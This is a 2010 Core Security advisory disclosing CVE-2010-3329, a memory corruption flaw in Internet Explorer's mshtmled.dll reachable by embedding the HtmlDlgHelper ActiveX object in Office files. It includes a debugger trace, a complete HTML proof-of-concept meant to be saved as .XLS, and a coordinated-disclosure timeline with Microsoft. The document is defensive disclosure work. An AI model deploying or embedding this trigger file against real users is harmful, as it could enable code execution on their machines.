Core Security Technologies Advisory 2010.0517

` Core Security Technologies - CoreLabs Advisory  
http://corelabs.coresecurity.com  
  
Microsoft Office HtmlDlgHelper class memory corruption  
  
  
1. *Advisory Information*  
  
Title: Microsoft Office HtmlDlgHelper class memory corruption  
Advisory Id: CORE-2010-0517  
Advisory URL:  
[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]  
Date published: 2010-10-12  
Date of last update: 2010-10-14  
Vendors contacted: Microsoft  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Missing Initialization [CWE-456]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2010-3329  
Bugtraq ID: N/A  
  
  
3. *Vulnerability Description*  
  
Microsoft Windows is prone to a memory corruption vulnerability when  
instantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office  
Document (ie: .XLS, .DOC). The affected vulnerable module is part of  
Internet Explorer ('mshtmled.dll'). This vulnerability could be used by  
a remote attacker to execute arbitrary code with the privileges of the  
user that opened the malicious file.  
  
  
4. *Vulnerable packages*  
  
. IE 6  
. IE 7  
. IE 8  
. MS Office XP  
. MS Office 2003  
. MS Office 2007 and MS Office 2010 (the control is disabled by default)  
  
  
5. *Non-vulnerable packages*  
  
. For further information and patches about this issue look at the  
Microsoft Security Bulletin Summary for October 2010 [1], patch ms10-071.  
  
  
6. *Credits*  
  
This vulnerability was discovered by Damian Frizza from Core Security  
Technologies.  
  
  
7. *Technical Description / Proof of Concept Code*  
  
Microsoft Windows is prone to a memory corruption vulnerability when  
instantiating the 'HtmlDlgHelper Class Object'  
('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office  
Document (ie: .XLS, .DOC). The affected vulnerable module is part of  
Internet Explorer ('mshtmled.dll'). The vulnerability occurs in  
'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is  
called and then makes access to uninitialized memory.  
  
The ActiveX control is marked as "Not Safe for Initialization", and  
prompts the user with: "ActiveX controls might contain viruses or other  
security hazards. Do not enable this content unless you trust the source  
of this file". However, in Office 2003 the bug is triggered even if the  
user answers "No" to the prompt.  
  
The following code is where the vulnerability occurs, when opening a  
.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'  
v8.0.6001.18702):  
  
/-----  
mshtmled!ReleaseInterface:  
42b919c0 8bff mov edi,edi  
42b919c2 55 push ebp  
42b919c3 8bec mov ebp,esp  
42b919c5 8b4508 mov eax,dword ptr [ebp+8]  
ss:0023:0013d104=00310065  
42b919c8 85c0 test eax,eax  
42b919ca 7406 je mshtmled!ReleaseInterface+0x12  
(42b919d2) [br=0]  
42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065  
42b919ce 50 push eax  
42b919cf ff5108 call dword ptr [ecx+8]   
ds:0023:7d02029c=2a2c277a  
  
eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc  
edi=00000000  
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na  
pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   
efl=00000206  
  
Stack Trace:  
<Unloaded_ion.dll>+0x2a2c2779  
mshtmled!ReleaseInterface+0x12  
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10  
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting  
destructor'+0xd  
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27  
VBE6!rtcStrConvVar+0xbd65  
VBE6!rtcSetDatabaseLcid+0xa823  
EXCEL!Ordinal41+0xd2ad0  
EXCEL!Ordinal41+0x14082a  
USER32!CallWindowProcW+0x1b  
Instruction Address: 0x000000002a2c277a  
-----/  
  
  
The following html code demonstrates the bug on Excel 2002/2003. Save  
the file as .XLS and open it on Excel.  
  
/-----  
<html xmlns:v="urn:schemas-microsoft-com:vml"  
xmlns:o="urn:schemas-microsoft-com:office:office"  
xmlns:x="urn:schemas-microsoft-com:office:excel">  
  
<head>  
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">  
<meta name=ProgId content=Excel.Sheet>  
<meta name=Generator content="Microsoft Excel 10">  
<!--[if !mso]>  
<style>  
v\:* {behavior:url(#default#VML);}  
o\:* {behavior:url(#default#VML);}  
x\:* {behavior:url(#default#VML);}  
.shape {behavior:url(#default#VML);}  
</style>  
<![endif]--><!--[if gte mso 9]><xml>  
<o:DocumentProperties>  
<o:LastAuthor>TEST</o:LastAuthor>  
<o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>  
<o:Version>10.6858</o:Version>  
</o:DocumentProperties>  
<o:OfficeDocumentSettings>  
<o:DownloadComponents/>  
</o:OfficeDocumentSettings>  
</xml><![endif]-->  
  
<!--[if gte mso 9]><xml>  
<x:ExcelWorkbook>  
<x:ExcelWorksheets>  
<x:ExcelWorksheet>  
<x:Name>test</x:Name>  
<x:WorksheetOptions>  
<x:CodeName>Sheet1</x:CodeName>  
<x:Selected/>  
<x:DoNotDisplayGridlines/>  
<x:ProtectContents>False</x:ProtectContents>  
<x:ProtectObjects>False</x:ProtectObjects>  
<x:ProtectScenarios>False</x:ProtectScenarios>  
</x:WorksheetOptions>  
</x:ExcelWorksheet>  
</x:ExcelWorksheets>  
<x:WindowHeight>9345</x:WindowHeight>  
<x:WindowWidth>13260</x:WindowWidth>  
<x:WindowTopX>240</x:WindowTopX>  
<x:WindowTopY>60</x:WindowTopY>  
<x:ProtectStructure>False</x:ProtectStructure>  
<x:ProtectWindows>False</x:ProtectWindows>  
</x:ExcelWorkbook>  
</xml><![endif]--><!--[if gte mso 9]><xml>  
<o:shapedefaults v:ext="edit" spidmax="1026"/>  
</xml><![endif]--><!--[if gte mso 9]><xml>  
<o:shapelayout v:ext="edit">  
<o:idmap v:ext="edit" data="1"/>  
</o:shapelayout></xml><![endif]-->  
</head>  
  
<body link=blue vlink=purple>  
  
<table x:str border=0 cellpadding=0 cellspacing=0 width=64  
style='border-collapse:  
collapse;table-layout:fixed;width:48pt'>  
<col width=64 style='width:48pt'>  
<tr height=17 style='height:12.75pt'>  
<td height=17 width=64 style='height:12.75pt;width:48pt' align=left  
valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201"  
coordsize="21600,21600"  
o:spt="201" path="m,l,21600r21600,l21600,xe">  
<v:stroke joinstyle="miter"/>  
<v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"  
o:connecttype="rect"/>  
<o:lock v:ext="edit" shapetype="t"/>  
</v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201"  
style='position:absolute;  
margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'  
strokecolor="windowText [64]" o:insetmode="auto">  
<![if gte mso 9]><o:title=""/>  
<![endif]><x:ClientData ObjectType="Pict">  
<x:SizeWithCells/>  
<x:CF>Pict</x:CF>  
<x:AutoPict/>  
</x:ClientData>  
</v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;  
position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;  
height:17px'><![endif]>  
  
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B"  
id=obj></object>  
  
<![if !vml]></span><![endif]><span  
style='mso-ignore:vglayout2'>  
<table cellpadding=0 cellspacing=0>  
<tr>  
<td height=17 width=64 style='height:12.75pt;width:48pt'></td>  
</tr>  
</table>  
</span></td>  
</tr>  
<![if supportMisalignedColumns]>  
<tr height=0 style='display:none'>  
<td width=64 style='width:48pt'></td>  
</tr>  
<![endif]>  
</table>  
</body>  
</html>  
  
-----/  
  
  
This exploitable condition was reproduced in the following versions of  
'mshtmled.dll':  
  
. 'mshtmled.dll' v8.0.6001.18702  
. 'mshtmled.dll' v8.0.6001.18000  
. 'mshtmled.dll' v7.0.6000.17023  
. 'mshtmled.dll' v7.0.6000.17080  
  
  
8. *Report Timeline*  
  
. 2010-05-28:  
Initial notification to the vendor. Draft advisory and proof-of-concept  
files sent to MSRC. Publication date set for July 13, 2010.  
  
. 2010-06-11:  
Core requests from the vendor an update on the status of this case.  
  
. 2010-06-14:  
The vendor responds that its engineers are still investigating this  
issue; and that they expect to have more information from the  
investigation and triage process within the next few days.  
  
. 2010-06-15:  
The vendors informs that they have been determined that the ActiveX  
control is marked as "Not Safe for Initialization"; and prompts the user  
with a dialog that warns the user that they are going to be executing a  
potentially malicious code. In consequence, the vendor treats this case  
as the same scenario as a user that tries to enable and open an Office  
document with a Macro or VBA code contained within.  
  
. 2010-06-15:  
Core asks the vendor if the previous mail means that it does not intent  
to fix the bug or that it does not recognize it as a security issue. The  
reporter's viewpoint is that a dialog prompt is not a fix "per se" and  
just a defense in depth mechanism; and that he would prefer to see the  
bug fixed rather than relying on mitigations that prevent exploitation.  
  
. 2010-06-15:  
Core adds the following information: in Office 2003 even if the user  
answers No to the ActiveX dialog, the application ends up crashing.  
  
. 2010-06-16:  
Vendor responds that it is currently investigating the new information.  
  
. 2010-06-28:  
Vendor informs that it has found that the vulnerable code actually  
exists and is owned by the IE team whom is currently investigating the  
crash; and that this case is transferred over to them (and to a new case  
manager as well).  
  
. 2010-07-02:  
Vendor informs Core that the IE team has finished the investigation into  
this issue and was able to reproduce the issue reported. During the  
investigation it was determined that this is an exploitable crash in  
Internet Explorer. Vendor will send Core the list of affected Internet  
Explorer versions when available.  
  
. 2010-07-02:  
Core acknowledges receipt of the update, and reminds that although the  
vulnerable code is owned by the IE team this also affects Office  
(including 2010). Core offers to postpone publication of its advisory  
from July 13th to August 10th on the basis of a firm commitment to a  
release date from the vendor's side. Core informs that it is evaluating  
the possibility of using Office killbit recently introduced by MS10-036  
as a workaround, but that MS10-036 points to a knowledge base article  
[2] that is no longer available.  
  
. 2010-07-07:  
Vendor acknowledges previous mail, and states that it will determine  
with the product team how this fix could be included in the August  
release. Vendor requests an updated version of the advisory, and to  
include a vendor statement.  
  
. 2010-07-22:  
Core requests an update on the status of the vulnerability report; and  
informs that publication of its advisory has been rescheduled to August  
10, 2010, despite the fact that Core did not receive any updates. Core  
informs that the publication of this advisory is transferred to a new  
case manager.  
  
. 2010-08-04:  
Core sends an updated version of the advisory and also asks if MSRC can  
provide:  
1. The list of affected software versions.  
2. The CVE number assigned to this vulnerability (if it exists).  
3. The steps to reproduce the vulnerability in IE [3].  
4. The link to the knowledge base article about the newly introduced  
Office killbit given that Core is investigating using that defense  
mechanism as a workaround but MS10-036 points to a knowledge base  
article that is no longer available  
([http://support.microsoft.com/kb/983632]).  
  
Core also notifies this advisory is currently scheduled to be published  
on August 10, 2010 but the publication can be reviewed if Microsoft  
responds with a firm commitment to a release date of fixes, and  
technical information about the root cause of this vulnerability.  
  
. 2010-08-04:  
MSRC responds that the updated advisory draft was internally forwarded  
and they are working on collecting answers to the requested questions.  
  
. 2010-08-05:  
MSRC sends the answers to the asked questions:  
1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.  
2. MSRC is unable to assign a CVE as it is too early. CVEs are  
typically assigned closer to the scheduled release date and MSRC will  
receive the block of CVEs from Mitre for the October release of the  
Internet Explorer security update.  
3. MSRC notifies there is no attack vector in IE, and they cannot  
provide steps to reproduce the vulnerability in IE.  
4. The knowledge base article about the newly introduced Office  
killbit was redirected to [http://support.microsoft.com/kb/2252664].  
  
. 2010-08-06:  
Core asks MSRC to clarify if the fix for this issue has been scheduled  
to be released in October.  
  
. 2010-08-06:  
MSRC confirms that the fix for this issue is scheduled for the October  
release of IE.  
  
. 2010-08-09:  
Core re-schedules the publication of the advisory for October 12 and  
notifies that this date should be considered as final, if Microsoft does  
not release fixes on that date, the advisory will be released as 'user  
release'.  
  
. 2010-08-09:  
MSRC confirms that the fix for this issue is scheduled for the October  
release of IE.  
  
. 2010-10-01:  
MSRC provides a status update about this issue and notifies that it is  
slated to be included in the October release of the IE Cumulative Update  
and SafeHTML update scheduled for October 12, 2010. MSRC also notifies  
that the CVE assigned to this issue is CVE-2010-3329.  
  
. 2010-10-01:  
MSRC notifies that they have made a mistake and included an invalid  
detail in the last status update. In particular, the issue does not  
affect the SafeHTML update scheduled for October but it will be shipping  
in the IE Cumulative Update scheduled for October.  
  
. 2010-10-01:  
Core acknowledges the MSRC's e-mail and notifies that although the  
problem is located in IE-owned code, the problem also affects Office up  
to 2010. Core assumes this will be specified in the MSRC bulletin and  
asks for confirmation.  
  
. 2010-10-04:  
MSRC confirms that the description of the vulnerability calls out that  
the vector to the vulnerability is through opening a word document.  
  
. 2010-10-12:  
Advisory CORE-2010-0517 is published.  
  
  
9. *References*  
  
[1] Microsoft security bulletin summary for October 2010 -  
[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].  
[2] Office killbit [http://support.microsoft.com/kb/983632].  
[3] This bug was originally investigated in Microsoft Office by Core,  
but MSRC determined [2010-07-02] that this bug is an exploitable crash  
in Internet Explorer.  
[4] MSRC was not able to reproduce this issue on IE6, however they  
notifies the code has been determined to exist in this version and the  
fix will be scoped to address this platform as well.  
  
  
10. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
[http://corelabs.coresecurity.com/].  
  
  
11. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and software  
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core  
Security Technologies can be reached at 617-399-6980 or on the Web at  
[http://www.coresecurity.com].  
  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2010 Core Security  
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]  
  
  
13. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].  
  
  
  
`